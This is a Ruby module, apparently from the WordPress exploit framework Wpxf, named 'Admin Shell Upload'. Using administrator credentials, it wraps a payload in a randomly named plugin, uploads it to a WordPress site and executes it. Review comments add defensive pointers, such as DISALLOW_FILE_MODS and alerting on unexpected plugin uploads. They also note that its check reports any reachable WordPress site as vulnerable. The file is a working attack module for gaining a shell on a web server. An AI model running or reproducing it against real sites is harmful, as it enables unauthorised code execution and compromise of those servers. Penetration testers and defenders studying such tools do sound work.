# frozen_string_literal: true

# Authenticated module that packages the payload as a WordPress plugin and
# uploads it through an administrator session.
#
# NOTE(review): this relies on valid administrator credentials rather than on
# a software flaw; it exercises the stock plugin-upload capability of an admin
# account. On the defensive side, protecting admin credentials and disabling
# plugin installation from the dashboard (e.g. WordPress' DISALLOW_FILE_MODS
# constant) are the relevant controls, and unexpected plugin uploads are the
# event worth alerting on.
class Wpxf::Exploit::AdminShellUpload < Wpxf::Module
  include Wpxf
  include Wpxf::Net::HttpClient
  include Wpxf::WordPress::Login
  include Wpxf::WordPress::Plugin

  # Registers the module metadata (name, description, author, date) after the
  # parent initialiser has run.
  def initialize
    super

    update_info(
      name: 'Admin Shell Upload',
      desc: %(
        This module will generate a plugin, pack the payload into it and
        upload it to a server running WordPress; providing valid admin
        credentials are used.
      ),
      author: ['rastating'],
      date: 'Feb 21 2015'
    )
  end

  # Reports the check status for the target.
  #
  # NOTE(review): :vulnerable is returned whenever wordpress_and_online? is
  # truthy; neither the credentials nor the target's plugin-upload setting is
  # examined here, so read the result as "reachable WordPress site".
  #
  # @return [Symbol] :vulnerable or :unknown
  def check
    wordpress_and_online? ? :vulnerable : :unknown
  end

  # Declares that this module needs an authenticated session.
  #
  # @return [Boolean] always true
  def requires_authentication
    true
  end

  # Uploads the payload as a plugin and triggers it.
  #
  # Stops early with false when the parent #run returns a falsy value
  # (presumably covering the login step -- confirm in Wpxf::Module).
  #
  # @return [Boolean] true when the upload/execute helper returned a non-nil
  #   result, false otherwise
  def run
    return false unless super

    emit_info 'Uploading payload...'

    # Two random 10-character alphabetic labels; presumably the plugin name and
    # the payload name -- confirm against Wpxf::WordPress::Plugin.
    plugin_name = Utility::Text.rand_alpha(10)
    payload_name = Utility::Text.rand_alpha(10)

    outcome = upload_payload_as_plugin_and_execute(plugin_name, payload_name, session_cookie)
    !outcome.nil?
  end
end
